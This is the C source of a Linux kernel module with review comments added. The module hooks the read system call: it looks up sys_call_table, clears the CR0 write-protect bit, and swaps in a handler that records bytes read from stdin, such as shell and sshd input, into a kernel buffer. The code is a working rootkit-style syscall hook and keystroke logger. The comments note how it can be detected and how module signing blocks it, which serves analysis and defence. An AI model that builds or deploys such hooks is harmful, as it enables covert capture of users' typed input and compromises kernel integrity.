- #include <linux/module.h>
- #include <linux/kernel.h>
- #include <linux/init.h>
- #include <linux/slab.h>
- #include <linux/string.h>
- #include <linux/syscalls.h>
- #include <linux/version.h>
- #include <linux/unistd.h>
- #include <linux/time.h>
- #include <linux/preempt.h>
- #include <asm/uaccess.h>
- #include <asm/paravirt.h>
- #include <asm-generic/bug.h>
- #include <asm/segment.h>
/*
 * Review summary: this module swaps the __NR_read slot of the syscall table
 * for hacked_read_test(), which records the first byte of every read on fd 0
 * in debug_buffer. The artifact it leaves is a syscall-table entry that points
 * into module memory instead of kernel text. Hosts that enforce module
 * signing or kernel lockdown refuse to load unsigned code such as this.
 */

/* Size in bytes of the in-kernel capture buffer (debug_buffer). */
#define BUFFER_SIZE 512
/* Prefix for every log line; also used as the module description. */
#define MODULE_NAME "hacked_read"
/*
 * Logging helpers built on pr_info/pr_err/pr_warn.
 * NOTE(review): dbg() tests a variable named `debug` that is not declared
 * anywhere in the visible listing; dbg() is never invoked here, so the
 * missing name does not show up at compile time.
 */
#define dbg( format, arg... ) do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
#define err( format, arg... ) pr_err( MODULE_NAME ": " format, ## arg )
#define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
#define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )
MODULE_DESCRIPTION( MODULE_NAME );
MODULE_VERSION( "0.1" );
MODULE_LICENSE( "GPL" );
MODULE_AUTHOR( "module author <mail@domain.com>" );
/* Capture buffer: hacked_read_test() appends one byte per stdin read. */
static char debug_buffer[ BUFFER_SIZE ];
/*
 * Saved syscall-table entry for __NR_read, set in hacked_read_init().
 * NOTE(review): in the read(2) ABI the second argument is a user-space
 * pointer; this prototype carries no __user annotation - confirm.
 */
unsigned long ( *original_read ) ( unsigned int, char *, size_t );
/* Address returned by find_sym( "sys_call_table" ); indexed by syscall number. */
void **sct;
/* Number of intercepted reads on fd 0. */
/* NOTE(review): original_read, sct and icounter have external linkage although
 * nothing in the visible listing uses them outside this file. */
unsigned long icounter = 0;
/*
 * Mask interrupts on the executing CPU and clear bit 16 of CR0 (the
 * write-protect bit), after which supervisor-mode writes to read-only pages
 * are no longer blocked. Callers in this file save CR0 with getcr0() first
 * and put it back with rw_disable().
 *
 * NOTE(review): cli masks interrupts only on the CPU that executes it, and
 * the asm statement declares no operands or clobbers; nothing in the visible
 * code accounts for other CPUs. Clearing CR0.WP from a loadable module is a
 * kernel-integrity violation; module-signature enforcement and kernel
 * lockdown exist to keep unsigned code like this from being loaded at all.
 */
static inline void rw_enable( void ) {
    asm volatile ( "cli \n"                   /* interrupts off (this CPU) */
        "pushq %rax \n"                       /* rax is used as scratch, so save it */
        "movq %cr0, %rax \n"
        /* mask has every bit set except bit 16 (CR0.WP) */
        "andq $0xfffffffffffeffff, %rax \n"
        "movq %rax, %cr0 \n"
        "popq %rax " );
}
/*
 * Read the current value of control register CR0.
 *
 * Returns the raw 64-bit register contents. The callers in this file keep
 * the value so that rw_disable() can write it back after the syscall table
 * has been modified.
 */
static inline uint64_t getcr0(void) {
    register uint64_t ret = 0;
    asm volatile (
        "movq %%cr0, %0\n"
        :"=r"(ret)
    );
    return ret;
}
/*
 * Write val into CR0 and re-enable interrupts.
 *
 * val: the CR0 value to install; callers pass what getcr0() returned before
 *      rw_enable() ran, which puts the write-protect bit back as it was.
 *
 * NOTE(review): sti is unconditional, so interrupts end up enabled whatever
 * their state was before rw_enable(); the asm declares no clobbers.
 */
static inline void rw_disable( register uint64_t val ) {
    asm volatile(
        "movq %0, %%cr0\n"
        "sti "
        :
        :"r"(val)
    );
}
/*
 * Look up a kernel symbol by name through kallsyms_on_each_symbol().
 *
 * sym: NUL-terminated symbol name to search for.
 *
 * Returns the recorded address cast to void*, or NULL when no symbol has
 * matched so far.
 *
 * NOTE(review): the result lives in a function-local static that is never
 * reset, so a lookup that finds nothing after an earlier successful one
 * returns the earlier address. Callers must also check for NULL.
 */
static void* find_sym( const char *sym ) {
    /* static: shared with the nested callback and kept across calls */
    static unsigned long match_addr = 0;

    /* Nested function (GCC extension): one call per symbol in the table. */
    int on_symbol( void *wanted, const char *name, struct module *owner, unsigned long addr ) {
        if ( strcmp( (char *)wanted, name ) != 0 )
            return 0;
        match_addr = addr;
        /* non-zero presumably ends the walk - confirm against kallsyms_on_each_symbol() */
        return 1;
    }

    kallsyms_on_each_symbol( on_symbol, (void *)sym );
    return (void *)match_addr;
}
/*
 * Replacement handler installed in the __NR_read slot.
 *
 * Reads on any descriptor other than 0 are forwarded unchanged to the saved
 * handler. For fd 0 (stdin, e.g. sh or sshd) the call is forwarded as well,
 * and afterwards the first byte of buf is appended to debug_buffer, which is
 * emptied once it holds more than BUFFER_SIZE - 100 characters.
 *
 * Returns whatever original_read() returned.
 *
 * NOTE(review): buf is the caller's buffer from the read(2) ABI, i.e. a
 * user-space address, yet strncat() dereferences it directly from kernel
 * context; kernel code must not touch user memory this way. The byte is
 * copied even when the forwarded read failed or returned 0, in which case
 * buf[0] is whatever was there before. debug_buffer and icounter are shared
 * by every task that calls read() and are updated without any locking. The
 * "%ld" conversions are given unsigned long / size_t arguments.
 */
unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {
    unsigned long nread;

    /* Only stdin is of interest; everything else passes straight through. */
    if ( fd != 0 )
        return original_read( fd, buf, count );

    /* Progress line in the kernel log every 1000 intercepted reads. */
    icounter++;
    if ( 0 == icounter % 1000 ) {
        info( "test2 icounter = %ld\n", icounter );
        info( "strlen( debug_buffer ) = %ld\n", strlen( debug_buffer ) );
    }

    nread = original_read( fd, buf, count );

    /* Record one byte, then reset the buffer when it is close to full. */
    strncat( debug_buffer, buf, 1 );
    if ( strlen( debug_buffer ) > BUFFER_SIZE - 100 )
        debug_buffer[0] = '\0';

    return nread;
}
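/*
 * Module entry point: locate sys_call_table, remember the current __NR_read
 * handler in original_read and replace the table slot with
 * hacked_read_test().
 *
 * Returns 0 on success, or -ENOENT when the symbol lookup fails. find_sym()
 * returns NULL in that case, and indexing the table through a NULL pointer
 * would oops the kernel, so the module refuses to load instead.
 *
 * NOTE(review): the table write happens with CR0.WP cleared on the current
 * CPU only (see rw_enable()); other CPUs can be executing read() while the
 * slot changes.
 */
int hacked_read_init( void ) {
    uint64_t cr0;

    info( "Module was loaded\n" );

    sct = find_sym( "sys_call_table" );
    if ( !sct ) {
        err( "sys_call_table not found\n" );
        return -ENOENT;
    }

    /* Keep the genuine handler so it can be called and later restored. */
    original_read = (void *)sct[ __NR_read ];

    /* Save CR0, lift write protection, patch the slot, restore CR0. */
    cr0 = getcr0();
    rw_enable();
    sct[ __NR_read ] = hacked_read_test;
    rw_disable( cr0 );

    return 0;
}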
/*
 * Module exit point: write the saved handler back into the __NR_read slot,
 * using the same save-CR0 / clear-WP / restore-CR0 sequence as the init
 * routine.
 *
 * NOTE(review): nothing in the visible code waits for tasks that are still
 * inside hacked_read_test() (for example blocked in the forwarded read)
 * before the module text goes away - confirm how unload is expected to be
 * made safe.
 */
void hacked_read_exit( void ) {
    register uint64_t cr0;
    info( "Module was unloaded\n" );
    cr0 = getcr0();            /* remember CR0 so it can be restored below */
    rw_enable();
    sct[ __NR_read ] = original_read;
    rw_disable( cr0 );
}
/* Register the load and unload handlers with the kernel module loader. */
module_init( hacked_read_init );
module_exit( hacked_read_exit );